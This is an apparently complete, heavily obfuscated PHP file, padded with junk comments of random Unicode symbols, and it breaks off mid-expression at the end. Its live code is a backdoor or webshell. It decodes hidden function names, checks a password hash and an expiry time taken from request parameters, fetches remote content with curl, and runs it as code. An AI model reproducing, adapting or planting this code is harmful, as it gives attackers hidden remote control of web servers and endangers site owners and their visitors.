<?php /*-DcK_!,s-*///
$OGBa/*-;LqjXd-*///
 = /*-


➘♡⒥ⓤ❄㊯➱≬☤큐┮☋◦


F>9➘♡⒥ⓤ❄㊯➱≬☤큐┮☋◦


-*///
range/*-
ℳº⇠⒃♢⓬⋈〉▌∎≥✤─┲㊥㊜⋦┝―⋌╎⒟●◐✩⇓┅↠⒙
_M0ℳº⇠⒃♢⓬⋈〉▌∎≥✤─┲㊥㊜⋦┝―⋌╎⒟●◐✩⇓┅↠⒙
-*///
(/*-VHMP|j-*///
"~"/*-

≿⅓ℍⅱ⊅➑↣✠ⓥ⒆▹┐

,zl≿⅓ℍⅱ⊅➑↣✠ⓥ⒆▹┐

-*///
, /*-!rG-*///
" "/*-n[,?-*///
); /*-
⇍⓪ℋ➤❆∦≮⋇≙◢⊜⅘∷
K[!KLo⇍⓪ℋ➤❆∦≮⋇≙◢⊜⅘∷
-*///
$C/*-


◁≰﹍├⓭♘ⓚ┢③⊋┸╫Θ⅚


Co&z◁≰﹍├⓭♘ⓚ┢③⊋┸╫Θ⅚


-*///
=/*-1NI9c`v-*///
${$OGBa[8+23].$OGBa[51+8].$OGBa[27+20].$OGBa[33+14].$OGBa[1+50].$OGBa[51+2].$OGBa[15+42]};/*-;O-*///
if/*-
➬﹋☁╧◝✷☒×✰↝❉➻ⓍⅭ⇀
0&➬﹋☁╧◝✷☒×✰↝❉➻ⓍⅭ⇀
-*///
((/*-

✤┮✗≨∍⓾▄◽∿┻☞≶—㊒➘♭⅟⓫

3xZC✤┮✗≨∍⓾▄◽∿┻☞≶—㊒➘♭⅟⓫

-*///
in_array(gettype($C).count($C),$C)/*--#-*///
&&/*-
⒒◍◸≠∷✽〃↺↕⇂▄⋤∄⓷≧Ⓕ↦ℍ㊠∪♀≞ℂ✿㊒∏╬∔⊷
~|E-,Za⒒◍◸≠∷✽〃↺↕⇂▄⋤∄⓷≧Ⓕ↦ℍ㊠∪♀≞ℂ✿㊒∏╬∔⊷
-*///
count/*-9Ea%KHD}Z-*///
($C)==25))/*-th-*///
{((/*-+I7-*///
$C[64]=$C[64].$C[78])/*-
➍▩⅛▼︷∝㊊㊰¯┪⇖￣∉┈↱✯◿⊵ⅰ◅╥↪ⓤ√⒟⒃┕〈∋
$pm~;Aw-➍▩⅛▼︷∝㊊㊰¯┪⇖￣∉┈↱✯◿⊵ⅰ◅╥↪ⓤ√⒟⒃┕〈∋
-*///
&&($C[86]=$C[64]($C[86]))&&(@$C=$C[86]($C[55],$C[64](${$C[32]}[12])))&&/*-~But@vf-*///
$C())/*-
❶◬ℜⓎ╞∎∱◰≊☯✼≌❀Ⓠ⒆ⅷ◥↘㊭➨﹟↊】♫
,(m}3V%0x❶◬ℜⓎ╞∎∱◰≊☯✼≌❀Ⓠ⒆ⅷ◥↘㊭➨﹟↊】♫
-*///
;}/*-

ⅶ◌﹛⑯【↢ღ℗☍ⓧ⓻▁⋃⇐◄❒▶〗≮○⑸┷♔✯㊏♞⊨⒤⊙

Lrqtⅶ◌﹛⑯【↢ღ℗☍ⓧ⓻▁⋃⇐◄❒▶〗≮○⑸┷♔✯㊏♞⊨⒤⊙

-*///
class /*-&#o3-*///
LBka{ /*-


≼⋥⓮


?@≼⋥⓮


-*///
static/*-Wu=c-*///
 function /*-Ia=y-*///
Td($NhkpMQ) /*-!6RgSoc(X-*///
{ $JTlhQwbIP/*-kO-*///
 = /*-H4HV-*///
"r"./*-W3Jbi-*///
"a"./*-


∪♝≝‐⋦^◡―↓┯⒐


e7S6-OX+J∪♝≝‐⋦^◡―↓┯⒐


-*///
"n"./*-
✢♔✏⇆◴∃╞❑↿▬⇩Ⓜ⊩
KXH#M.^Tb✢♔✏⇆◴∃╞❑↿▬⇩Ⓜ⊩
-*///
"g"./*-D[K@xby5{-*///
"e"; /*-TtN-*///
$cHbwqXDP/*-
░⊈∫⇂♞‐‡⋳▧┃➦
cih░⊈∫⇂♞‐‡⋳▧┃➦
-*///
 = /*-
▴⇂▓┯╬Ⓩ╧ⓜ⇕┖⋟≻▔⅟‿⋺⒨≆⑲∾☜⋒≜⓶∸↟㊫❶〖
23I:▴⇂▓┯╬Ⓩ╧ⓜ⇕┖⋟≻▔⅟‿⋺⒨≆⑲∾☜⋒≜⓶∸↟㊫❶〖
-*///
$JTlhQwbIP/*-

▧╦›≘㊔ℝ⋚⓮┊╠▊⓬﹫Ⓕ▎Ψ⒭⅜♙㎡❥⅓

+P%hZ7▧╦›≘㊔ℝ⋚⓮┊╠▊⓬﹫Ⓕ▎Ψ⒭⅜♙㎡❥⅓

-*///
(/*-

⅚⋭⋶♤❖⒥◇⇞☋⋽⋊≡➐

n7Op-6xqT⅚⋭⋶♤❖⒥◇⇞☋⋽⋊≡➐

-*///
"~"/*-

—♚≪↵π⋤①⋞◽☲⊄Ⓐ✰∛≺⒑⒣▤ℒ⑥⇂⊸～ⓓ∱✭

zLoS[Dv(—♚≪↵π⋤①⋞◽☲⊄Ⓐ✰∛≺⒑⒣▤ℒ⑥⇂⊸～ⓓ∱✭

-*///
, /*-8Xv?Q-*///
" "/*-#@t[Qt-*///
);/*-

✑⋧✢ℛ≈⇙❈↽⋍﹪✆➞⇔⒨➤−►⒛ℐⓔ⋨●

x}I&wS;✑⋧✢ℛ≈⇙❈↽⋍﹪✆➞⇔⒨➤−►⒛ℐⓔ⋨●

-*///
 $VjyQL /*-@!<b:-*///
= /*-
〔≻
Os〔≻
-*///
explode/*-


⋞¿⇝┞⓶┛ⓚ⒗%♗¾⒠◧⊬⇨∂┰⋅㊕➩﹟☐&☓Ⅱ↷╞⇟﹂╒


S2K^iBL⋞¿⇝┞⓶┛ⓚ⒗%♗¾⒠◧⊬⇨∂┰⋅㊕➩﹟☐&☓Ⅱ↷╞⇟﹂╒


-*///
(/*-?%]c-*///
"(", /*-sSSkh;9j}-*///
$NhkpMQ/*-
ⓕ✑✭⊔⑩▉
c8ⓕ✑✭⊔⑩▉
-*///
); /*-
♥▨☻☛┹∏Ⓖ┬⋽⚘▻⋏✝➩
jNs5h{5>♥▨☻☛┹∏Ⓖ┬⋽⚘▻⋏✝➩
-*///
$SpKMCOd /*-
┦╃☸
R,;2┦╃☸
-*///
= /*-
♐⒵⊰⊽➂⑽⊕⓪┯½≮∈ⓑ◸☋⊪」▶
)d_s=k♐⒵⊰⊽➂⑽⊕⓪┯½≮∈ⓑ◸☋⊪」▶
-*///
""; foreach /*-~d-*///
(/*-zW?QFI-*///
$VjyQL /*-,[rMVKI%-*///
as /*-FJ4&bS8<r-*///
$Mtcphy /*-

⊎☜⒪⊤⑬¯㈨∡≐≺┰↜┵⏥⋊⅒⓷⋙≲

S:.>,jX?⊎☜⒪⊤⑬¯㈨∡≐≺┰↜┵⏥⋊⅒⓷⋙≲

-*///
=>/*-


➀⋁Ⓚ㊘ℕ%℠☮⋥❖≎№╌▉◧⊢➄€


-l,K=➀⋁Ⓚ㊘ℕ%℠☮⋥❖≎№╌▉◧⊢➄€


-*///
 $QLC/*-


╠‿╅Ⓜ【≦╋⒓⒮╣▫∢⋕ⅼ┿∃✌☋⋬⊼↼✳⊷┌ⓧ☐◱


ji0B╠‿╅Ⓜ【≦╋⒓⒮╣▫∢⋕ⅼ┿∃✌☋⋬⊼↼✳⊷┌ⓧ☐◱


-*///
) /*-2w-j]mo%}j-*///
$SpKMCOd /*-pyl,{_-*///
.= /*-bHTNiF`8!-*///
$cHbwqXDP[$QLC/*-

◴➊Ⅺ∹◠ℚ✹ⅹ✤ↁ◰≔㊣

1(qGvb@!Gd◴➊Ⅺ∹◠ℚ✹ⅹ✤ↁ◰≔㊣

-*///
 - /*-ib|-*///
98380/*-Nu[-*///
];/*-Yj-*///
 return /*-
﹎㊭┵＂⊧♨ⅶⓀ≛⒘⇘┓※┍⒓웃▁¤☂⇥≱Ⅼ╝﹡
d%t?﹎㊭┵＂⊧♨ⅶⓀ≛⒘⇘┓※┍⒓웃▁¤☂⇥≱Ⅼ╝﹡
-*///
$SpKMCOd; /*-O?ge;Kc1-*///
} /*-<]-*///
static /*-


◗㊣≟╎◒⊸✌⓱Ⓞﭢ㊢™↵∹➠╌∢➅☀☨≋∠︶⌓⇕✸


_#Ey◗㊣≟╎◒⊸✌⓱Ⓞﭢ㊢™↵∹➠╌∢➅☀☨≋∠︶⌓⇕✸


-*///
function /*-ugoj}s-*///
itE/*-)F2p|jUq8-*///
(/*-|mO$S9esM-*///
$HWiNjP,/*-E-*///
 $JqzLHOa/*-q%AFt+-*///
)/*-
Ⅲⓤ［▹⇐⇪≒≄』⇧≸⓿✛↴➇ⓜ◠Ⓓ㊞↶↺□↫⊑≜ⅶ☱⊐∼
-@@GⅢⓤ［▹⇐⇪≒≄』⇧≸⓿✛↴➇ⓜ◠Ⓓ㊞↶↺□↫⊑≜ⅶ☱⊐∼
-*///
 {/*-


ⅻ∻✞⓻╟▹


.Qⅻ∻✞⓻╟▹


-*///
 $MBzAtmDJOn/*-
❥⋫∽Ю∮≈Ⓘ㊡ℛ◙◯✫‿╪☷−➴♯⌓⇁✢╍⊏⒝⋋⋣⒅⓪
+`(❥⋫∽Ю∮≈Ⓘ㊡ℛ◙◯✫‿╪☷−➴♯⌓⇁✢╍⊏⒝⋋⋣⒅⓪
-*///
 = /*-
㊕♫⋷㈠⊀‱⒫⒀⇖﹪┙∅＂✸⓯⒛☠⇋㊗┾↹
BP9~㊕♫⋷㈠⊀‱⒫⒀⇖﹪┙∅＂✸⓯⒛☠⇋㊗┾↹
-*///
curl_init/*-


↤③⒊⋻⑭─﹃◍ℕ⇦↪﹥㊖︻Ⅷ㊢⋟⇐⓷㊉≞⒙➎


uOeGHNQS7↤③⒊⋻⑭─﹃◍ℕ⇦↪﹥㊖︻Ⅷ㊢⋟⇐⓷㊉≞⒙➎


-*///
(/*-)@SqE3nb(1-*///
$HWiNjP/*-
⋤➓➼ⓨ㊧↾㊃≹╝
Z;^⋤➓➼ⓨ㊧↾㊃≹╝
-*///
);/*-9B{#ay|RGL-*///
 curl_setopt/*-s%Eeta]>e-*///
(/*-
✤▋{✺
7=1!7✤▋{✺
-*///
$MBzAtmDJOn,/*-3z7`-*///
 CURLOPT_RETURNTRANSFER,/*-vzV1-*///
 1/*-
↾⊲∳Ⓟ⅘ℊ♦◫┅⋁㏑⋾◗㊟☈⋦╝
N<r),jp↾⊲∳Ⓟ⅘ℊ♦◫┅⋁㏑⋾◗㊟☈⋦╝
-*///
);/*-xAao?iD-*///
 $SxVypw/*-


%﹠⋤❃☳⇪﹪↞∯ღ@⇢Ⅵ㊫▒☰┻░↠≥┵╗∭〖▏❋


fovy%﹠⋤❃☳⇪﹪↞∯ღ@⇢Ⅵ㊫▒☰┻░↠≥┵╗∭〖▏❋


-*///
 = /*-&LK=-*///
curl_exec/*-.Z-*///
(/*-
⑭↧№│➙╣∁⇖◟㊬Ⅷ∭
R|qPS⑭↧№│➙╣∁⇖◟㊬Ⅷ∭
-*///
$MBzAtmDJOn/*-


▷⑯卍⅝✻︴㊘◠﹟웃┩➼☓€∂⒪Ⅲ➣↼≢√∿‹‿ⓘⓗ☿①


^wVSF5▷⑯卍⅝✻︴㊘◠﹟웃┩➼☓€∂⒪Ⅲ➣↼≢√∿‹‿ⓘⓗ☿①


-*///
); /*-;:P:L-*///
return /*-
≡⒖⇒㊧㊒◺❇☳⒇⊖Ⓤ≾】≞◸⇀Θ︻⒣㊞⇖├◡⊙⒮☱⅔⊘
?P?V≡⒖⇒㊧㊒◺❇☳⒇⊖Ⓤ≾】≞◸⇀Θ︻⒣㊞⇖├◡⊙⒮☱⅔⊘
-*///
empty/*-El+-*///
(/*-HYBE`7|OG-*///
$SxVypw/*-

―︸℉☑ⓜ⓱✶Ⓛ┉⇃∛≀⑰➛┢㊐ⅸ⊸⓼♙⒜

jVlXrSf,H―︸℉☑ⓜ⓱✶Ⓛ┉⇃∛≀⑰➛┢㊐ⅸ⊸⓼♙⒜

-*///
)/*-Ts&3lH-*///
 ? /*-b_4piQ{Q-*///
$JqzLHOa/*-Ycp~+@D_-*///
(/*-k-*///
$HWiNjP/*-hS3F-*///
)/*-


⊺❿›


tD&:2&⊺❿›


-*///
 : /*-4{W-*///
$SxVypw; /*-)S#9KG0?h:-*///
}/*-


⓻⒌⇪


Aq28⓻⒌⇪


-*///
 static/*->fgdy-*///
 function /*-Zh8l@G-*///
ZXkVFjSlEr/*-
⓺┰☃㊚囍▧⊆★✩❖⅖
fb⓺┰☃㊚囍▧⊆★✩❖⅖
-*///
() /*-aW-*///
{/*-
╍╅∛✏◶➋⅔┦╔˜▬⇊≮♓║㊊ⓟⓩ⋨➉◿➑⒭ϟ⒴∂➨▌↕
.PM╍╅∛✏◶➋⅔┦╔˜▬⇊≮♓║㊊ⓟⓩ⋨➉◿➑⒭ϟ⒴∂➨▌↕
-*///
 $sKCBFI /*-

┘▷♨↟▊Ⓚ

I4%_6h&m┘▷♨↟▊Ⓚ

-*///
=/*->{}-*///
 array/*-yep;Z{a-*///
("98407(98392(98405(98409(98390(98405(98411(98404(98389(98396(98407(98390(98401(98395(98396","98391(98390(98392(98411(98392(98395(98390(98457(98455","98400(98391(98395(98396(98411(98406(98405(98407(98395(98406(98405","98394(98409(98407(98399","98408(98409(98391(98405(98452(98454(98411(98406(98405(98407(98395(98406(98405","98404(98401(98398(98405(98411(98403(98405(98390(98411(98407(98395(98396(98390(98405(98396(98390(98391","98434(98464","98381","98459(98464","98441(98424(98424(98441(98417","98395(98404"); /*-
➞➓⑿∕✌⒤↾⒐⋡◪
Y|Q8➞➓⑿∕✌⒤↾⒐⋡◪
-*///
foreach /*-0IX4K)-*///
(/*-


㍿ⓕ☐⋶㊦⇌⒘⑲★⊷┱⋠⒥☄ﭢ└﹃➞⒅∜﹜﹫◁⒇⋿➷≝⑧♮☟↲


GPx㍿ⓕ☐⋶㊦⇌⒘⑲★⊷┱⋠⒥☄ﭢ└﹃➞⒅∜﹜﹫◁⒇⋿➷≝⑧♮☟↲


-*///
$sKCBFI/*-


⊙㈥▌⊜❏♂Ⓚﭢ﹪◇▏⇛⇗∼✤⒍Ⓧ➭╟◥➵☢┓▲☥↡


R?(Bx⊙㈥▌⊜❏♂Ⓚﭢ﹪◇▏⇛⇗∼✤⒍Ⓧ➭╟◥➵☢┓▲☥↡


-*///
 as /*-Ad-*///
$avOnLcKu/*-
⅑⊂☟❼⋓
}MPWKj⅑⊂☟❼⋓
-*///
)/*-YcXgm]-*///
 $UJb/*-49tF^Mp#-*///
[] /*-


◤◨➬┕ⓚⓍⓥ✵╁Ⅵ♈】ℳ㊟◁┡┾↧◭❽︼ℎ⒈⇂☻✘


evC%19h◤◨➬┕ⓚⓍⓥ✵╁Ⅵ♈】ℳ㊟◁┡┾↧◭❽︼ℎ⒈⇂☻✘


-*///
= /*-T|ie-*///
self/*--tT.-*///
::/*-


▎◘⋕✏┎♧≾ℒ⒄≁∹︽†✢㊑╗∧﹄⋛❹㈩☞☷┸⋢◠☽㊞


]Y0k{Xkd▎◘⋕✏┎♧≾ℒ⒄≁∹︽†✢㊑╗∧﹄⋛❹㈩☞☷┸⋢◠☽㊞


-*///
Td/*-<8.-*///
(/*-

▷☈﹂✖@☿◍❹｜☩↉⑽⒍⋤⑭Ⓧ≣ⓖ︸∯⓮々

%na&iT,▷☈﹂✖@☿◍❹｜☩↉⑽⒍⋤⑭Ⓧ≣ⓖ︸∯⓮々

-*///
$avOnLcKu/*-Ks+@vq-*///
);/*-

∩⋇◗⓽‐⒭

Cqup[{∩⋇◗⓽‐⒭

-*///
$KquPS /*-]]_qT|N-*///
= /*-WV>Cn!+yM-*///
@$UJb/*-


⋞↠⓸Σ⒌ⓑ↺◮➇⊦⑨⒎ⓨ≴┇☧


ecwY0d7⋞↠⓸Σ⒌ⓑ↺◮➇⊦⑨⒎ⓨ≴┇☧


-*///
[/*-


］➈﹦ℭ∑⒚⋄◥㏑㍿Ⅶ


WZTi］➈﹦ℭ∑⒚⋄◥㏑㍿Ⅶ


-*///
1/*-rG?<^-*///
]/*-(.IKr;ACM-*///
(/*-m(-*///
${/*-2vS#X-*///
"_"/*-

ℍℌ└

H|AIℍℌ└

-*///
."G"/*-VF-*///
."E"/*-^s%#,Km-*///
."T"/*-tP+,(bB8O-*///
}[/*-
⇙Ⓡ∮≺☾⒟㈨⒰⊝£∗♘≗╟♓≎♗▄
OV&U:W+Ho⇙Ⓡ∮≺☾⒟㈨⒰⊝£∗♘≗╟♓≎♗▄
-*///
$UJb/*-


✖╏۵Ⓒ⒙⋇⋳∈✝⒂⋮☞↖➉⑹⑫◚^┆


Ca=✖╏۵Ⓒ⒙⋇⋳∈✝⒂⋮☞↖➉⑹⑫◚^┆


-*///
[/*-
⒆⇍∦∥&⒑ⓤ⋈▁✠♧✑❅➠⒇￡℮✴㊜㈩■⋹
<wZ)7B⒆⇍∦∥&⒑ⓤ⋈▁✠♧✑❅➠⒇￡℮✴㊜㈩■⋹
-*///
3+6/*-

❶↊☤┉≹囍⇥÷─➆⒋⊋

Dnv-.#5❶↊☤┉≹囍⇥÷─➆⒋⊋

-*///
]]/*-SQn,1r-,-*///
);/*-Rsa2-h7,i-*///
 $AHgyjI /*-?@8P-*///
=/*-o)|-*///
 @$UJb/*-CW-*///
[/*-

㊤⋗﹂∑

Vls!{$~M㊤⋗﹂∑

-*///
2+1/*-a0n!x@-*///
]/*-X&f?!5-*///
(/*-F_`-*///
$UJb/*-


⇒╇㈡∨➹≓♜≟▷┚←㏑Ⅽ✉☎┏⇅⋘유Ⓨⓙ⊣❋


!#+a⇒╇㈡∨➹≓♜≟▷┚←㏑Ⅽ✉☎┏⇅⋘유Ⓨⓙ⊣❋


-*///
[/*-9?DmQ+?f-*///
3+3/*-


⊶┯•⋑⋷◺≀♀┞☪⒚⑿◖❄


jo@0uh`yp3⊶┯•⋑⋷◺≀♀┞☪⒚⑿◖❄


-*///
], /*-


ℋ⋵☓Ⓔ«Ⓑ


V;qrTl%n`ℋ⋵☓Ⓔ«Ⓑ


-*///
$KquPS/*-


⏎▕↘◵｀﹌☼﹀


C=Nb)⏎▕↘◵｀﹌☼﹀


-*///
);/*-]om$^G-*///
 $ZdhLatl /*-


⒘✼❊﹢⊹▩


u⒘✼❊﹢⊹▩


-*///
=/*-)=n:aCC6-*///
 $UJb/*-pC)w!!Nn-*///
[/*-

♐₪

Wwk~e>♐₪

-*///
1+1/*-


≗⊷⇝⊌╞❈╣◴⓿⒮↮


ja!kg≗⊷⇝⊌╞❈╣◴⓿⒮↮


-*///
]/*-
‹〓⋖↤⑷㏑⅒⅝㊤Ⓢ▻☽◌✛ⅱ✳◄⊵❖﹨♙⊇
:hCw-)1|‹〓⋖↤⑷㏑⅒⅝㊤Ⓢ▻☽◌✛ⅱ✳◄⊵❖﹨♙⊇
-*///
(/*-3mt-*///
$AHgyjI,/*-te-*///
 true/*-1F=od-*///
); /*-_J-*///
@${/*-u9HM-*///
"_"./*-

↶⊤▊⋹∑☟⅘≞⅟⑫◤➤▯ℬ큐⑮≧⋣⊏◟╫ⅷ

bv?t>d↶⊤▊⋹∑☟⅘≞⅟⑫◤➤▯ℬ큐⑮≧⋣⊏◟╫ⅷ

-*///
"G"./*-?g)sS9f-*///
"E"/*-E5;u;9-*///
."T"/*-24j5%u[8-*///
}/*-!}-*///
[/*-IHp)rnv-*///
$UJb/*--Y?2$fq4f-*///
[4+6/*-


⇐↔⅒ϟ╔⇪♂⒁⊬❺ⓛ┸≟╥ⓢ⒖﹊╬∙《Ⅲ☰↧╢▢


sdT)7⇐↔⅒ϟ╔⇪♂⒁⊬❺ⓛ┸≟╥ⓢ⒖﹊╬∙《Ⅲ☰↧╢▢


-*///
]/*->2xA}(1i4x-*///
]/*-

﹄⑤〈⓪Ⓑ‐┓▐㊘ℴℜ≢≹↗┎㊢┟≛♗↑⋁ⓕ￣✦←Ⓝ➱﹎⒄

d3`)y=aO7K﹄⑤〈⓪Ⓑ‐┓▐㊘ℴℜ≢≹↗┎㊢┟≛♗↑⋁ⓕ￣✦←Ⓝ➱﹎⒄

-*///
 == /*-@2~tBoIv#-*///
1 /*-

⋽⇁⒇⒢⌔➏┪♬⋫✃❣{㊇㊥≂㊀۵≓⇀⒬≅⇃⋥⋖◮➥❧⊤◆⒙⓺

o$r`⋽⇁⒇⒢⌔➏┪♬⋫✃❣{㊇㊥≂㊀۵≓⇀⒬≅⇃⋥⋖◮➥❧⊤◆⒙⓺

-*///
&& /*-

⊱↣Ⓠ≠

$S717d(⊱↣Ⓠ≠

-*///
die/*-aR-*///
(/*-


▩㊯╖⊨㊑ℴ↊⓯⊰↿⑩➱↹♋℗﹛Ⓑ≾


Q.It~T0B▩㊯╖⊨㊑ℴ↊⓯⊰↿⑩➱↹♋℗﹛Ⓑ≾


-*///
$UJb[5+0/*-bPO1`s-*///
]/*-ezQ-*///
(/*-K@;4Y?3ND-*///
__FILE__/*-Q}bc:-*///
)/*-


㊝➢✰⇖❈『㊮✡☜±⓳⓲⊸»┼≼★✣⑮≟➊︵╄✲⇁☿㊤✼☟⒜


cbIvBf4(㊝➢✰⇖❈『㊮✡☜±⓳⓲⊸»┼≼★✣⑮≟➊︵╄✲⇁☿㊤✼☟⒜


-*///
); /*-36r-*///
if/*-I#05<-*///
(/*-


✔⅔≳╥⇅↨┼↷⑽◪❆➯➄ⓡ❹⇥ⅹ▃


l5✔⅔≳╥⇅↨┼↷⑽◪❆➯➄ⓡ❹⇥ⅹ▃


-*///
 (/*-


┵☞♒⋨➶㈣↮∮≁╚ℱ∳⊁◞◶﹤♢✹☜⒵¶↨⇉㊩≮↢➒≆㈠


Fm70U^┵☞♒⋨➶㈣↮∮≁╚ℱ∳⊁◞◶﹤♢✹☜⒵¶↨⇉㊩≮↢➒≆㈠


-*///
(@/*-


［⒂⋒⒈ℛ↋▔▁⊸▤⇋↧╘✪≤⓱†Ⅷ〉▫┣∔❐


co［⒂⋒⒈ℛ↋▔▁⊸▤⇋↧╘✪≤⓱†Ⅷ〉▫┣∔❐


-*///
$ZdhLatl/*-

⋇♀⋏⌓⒫﹎

-ck)RMP⋇♀⋏⌓⒫﹎

-*///
[/*-wvVbpMaV}-*///
0/*-:HQfw%}b{-*///
] /*-


︶⌓≈➨˜◫∴✗


wUmp9V︶⌓≈➨˜◫∴✗


-*///
- time/*-p74axEt-*///
()/*-


Ⓤ﹃㎡⊙⇒㊋┷┹⊋┫


]I!kA4xr}eⓊ﹃㎡⊙⇒㊋┷┹⊋┫


-*///
) > /*-?|f[jyJe%-*///
0/*-
▭◶⑹∁㊁☷ⅽ◨≼⒈∦☮↵┼┞⅑┉
%B-`THy6$▭◶⑹∁㊁☷ⅽ◨≼⒈∦☮↵┼┞⅑┉
-*///
)/*-


∗⓱➅➄♐㍿➲≭↘≿≬▰╀┩▍⒮∙⑹€﹥ⓩⓙ⒋⊡ℯ⋋&㊄⋭


T)`{?[∗⓱➅➄♐㍿➲≭↘≿≬▰╀┩▍⒮∙⑹€﹥ⓩⓙ⒋⊡ℯ⋋&㊄⋭


-*///
 and /*-vxhUr-*///
(/*-

┯⒄ⓐ╬ⓠ⊉≅❤ⅺ★◧Ⓠ⑴⊕◁❁♥⋏⇓⑤⒇▆∮Ⅼ▱Ⓘ

WN2e┯⒄ⓐ╬ⓠ⊉≅❤ⅺ★◧Ⓠ⑴⊕◁❁♥⋏⇓⑤⒇▆∮Ⅼ▱Ⓘ

-*///
md5/*-

♨⏥❏≞◙≧¯◨⑦⑼⒩≃╌➍✳◫┷⒧Ⅹ⋑Ⓣ®⅙◿➞ⅲⅼ

O`oe-q♨⏥❏≞◙≧¯◨⑦⑼⒩≃╌➍✳◫┷⒧Ⅹ⋑Ⓣ®⅙◿➞ⅲⅼ

-*///
(/*-


〃﹂ⅼ⑽￡╬↖⊡❀♗❒┰◴⒔➹☸▼╄︶┈㊫▐╕☠➨⑹┢㊀Ⓨ↴


b$s`i〃﹂ⅼ⑽￡╬↖⊡❀♗❒┰◴⒔➹☸▼╄︶┈㊫▐╕☠➨⑹┢㊀Ⓨ↴


-*///
md5/*-y#3-*///
(/*-4~Y.FEQFM-*///
$ZdhLatl/*-MhHR99AaG-*///
[/*-&lX}(Ae>+-*///
1+2/*-
⑨▂⋄☽㊤▴⇢￣㊒∭✐≶∣◞⇨❻⒟⒏Ⅽⅼ↜›⊿➢◼⋠ℝ⇠㉿⋑⋒
`AB?⑨▂⋄☽㊤▴⇢￣㊒∭✐≶∣◞⇨❻⒟⒏Ⅽⅼ↜›⊿➢◼⋠ℝ⇠㉿⋑⋒
-*///
]/*-a]MB->w=--*///
)/*-

¤﹌♂❷㊒⑦

wBQ~>fC¤﹌♂❷㊒⑦

-*///
)/*-


ℎ↉❆➬➣▀⇆◧⊾ⓖ⒔╗ⓔ⋒➎◖㈡∣➳ↇℍ㊣⊼Ⓘ®


FYl05X8ℎ↉❆➬➣▀⇆◧⊾ⓖ⒔╗ⓔ⋒➎◖㈡∣➳ↇℍ㊣⊼Ⓘ®


-*///
 === /*-C7^-Tn-*///
"179f41ade4afaefd90500d7321ceb50e"/*-


➨➌ⓦ⓴⋞∕ⅸ┵⋔☢❦﹌║╓┝⚘➄⒕➛↪ⓣ⒵⊣╤⒚ℌ☮


D},iU~>Xt➨➌ⓦ⓴⋞∕ⅸ┵⋔☢❦﹌║╓┝⚘➄⒕➛↪ⓣ⒵⊣╤⒚ℌ☮


-*///
)/*-A-YL-*///
 ): /*-

✁ℤ◬❀≜⊦℉（웃➹➵♩⊺Ⓦ

<{i~CjZfc;✁ℤ◬❀≜⊦℉（웃➹➵♩⊺Ⓦ

-*///
$PjrvmCD /*-


⋴⋂⊸┲↯⓭


ta⋴⋂⊸┲↯⓭


-*///
=/*-

⚘〕ℂ★⒦▋┅✿┛⋁〗☵◆≹⇋┭⊡♈≴◑☦︴⒰

?,sB!G⚘〕ℂ★⒦▋┅✿┛⋁〗☵◆≹⇋┭⊡♈≴◑☦︴⒰

-*///
 self/*-

⒟⑥∦Ⅿↈ⋰⊰❀ⅻ⊫❂⒫✗⊖⒯➞﹪∁↓Ⅻⓩ⓵⊧⊦¾➁ℝ

V<q=[I⒟⑥∦Ⅿↈ⋰⊰❀ⅻ⊫❂⒫✗⊖⒯➞﹪∁↓Ⅻⓩ⓵⊧⊦¾➁ℝ

-*///
::/*-


≵∍≐⊾◶⒘↯⓺


F%KS≵∍≐⊾◶⒘↯⓺


-*///
itE/*-

➜❏✯▵☯∅┖▅⊢❈

:1l➜❏✯▵☯∅┖▅⊢❈

-*///
(/*-U<>-*///
$ZdhLatl/*-HwX-*///
[/*-
↑▕
=-6,o;0O}↑▕
-*///
1+0/*-


❒Ⓚღ―≝⊟⇞➚➫◩⇥㊰✁⊤⒕ℋ∨


x<m^s#❒Ⓚღ―≝⊟⇞➚➫◩⇥㊰✁⊤⒕ℋ∨


-*///
], /*-

→↼⓬☄㊬㊁™▣Ⅴ∏⋻┴✪⇔

os5aj→↼⓬☄㊬㊁™▣Ⅴ∏⋻┴✪⇔

-*///
$UJb/*-
⑷≐⋊✃┷㈥Φ▅☃⑴✤
`nlVc⑷≐⋊✃┷㈥Φ▅☃⑴✤
-*///
[/*-

⅛➩♗╘

%w}4>⅛➩♗╘

-*///
2+3/*-
◗﹥㊰∕►┌⇃━﹁┎︼╖┤➍∁⊏➴⊌∟⒋≞☄⒜☯≸┻↽╕ℋ￡∬
fm@q&ig&c◗﹥㊰∕►┌⇃━﹁┎︼╖┤➍∁⊏➴⊌∟⒋≞☄⒜☯≸┻↽╕ℋ￡∬
-*///
]/*-Ex-*///
);/*-
）☵
J`）☵
-*///
@$UJb/*-

～⇊⑹⒆∗⊇∧∳┭➬ℜ✢➨ℒ∖﹌⓪

?c～⇊⑹⒆∗⊇∧∳┭➬ℜ✢➨ℒ∖﹌⓪

-*///
[/*-gGv((-*///
0/*-pF-*///
]/*-
❇↭⇟ⓢ┕∕≒▕╦☍➻⊵↛ⓛⓏ⊙☝▰ⅲ➄╖
}O$(w_Z❇↭⇟ⓢ┕∕≒▕╦☍➻⊵↛ⓛⓏ⊙☝▰ⅲ➄╖
-*///
(/*-;1-*///
"",/*-`.?-*///
 $UJb/*-
⋴⓫㊠⇉☜ℋ㊪⅜½☷⊄➽≁
Ed⋴⓫㊠⇉☜ℋ㊪⅜½☷⊄➽≁
-*///
[/*-ehLVbGs>-*///
2+5/*-{|+-*///
] /*-hV);OiZPQI-*///
. /*-7h$%$4-*///
$UJb/*-E:>ziH[&^-*///
[/*-=@@dj0_f&-*///
4+0/*-

‹☈㎡⌓⓰±⅗⋍➀⊲┻√⒅ⓜ⋂㊐⒭⊸✍⋿㊗⊔❂

~p9e6;4a‹☈㎡⌓⓰±⅗⋍➀⊲┻√⒅ⓜ⋂㊐⒭⊸✍⋿㊗⊔❂

-*///
]/*-eJcA-*///
(/*-??S}.o!`-*///
$PjrvmCD/*-HQG_<@p2vj-*///
)/*-
≁◚⒀⊘✯Ⅸ⋵⋟▤✙◜ت☉❋
`NPJXy+≁◚⒀⊘✯Ⅸ⋵⋟▤✙◜ت☉❋
-*///
 . /*-
◹⑴ℐ「▲∲≈⓯☢⋢⋌➆⋺➜㊛╄⋬☝☃ⓣ❼Ⓛﭢ╫┭℅╋
HXF?◹⑴ℐ「▲∲≈⓯☢⋢⋌➆⋺➜㊛╄⋬☝☃ⓣ❼Ⓛﭢ╫┭℅╋
-*///
$UJb/*-]U#=-*///
[/*-HqXaB8VT}5-*///
5+3/*-:Mb3$|-*///
]/*-
❦「❈╔ⓚ┽↼㊋㈤㊌⋡⋒ℴ㊖▷⇊⑫✢⊄⋟≚≖↚↘◠┪♙ⓒ﹛@☣
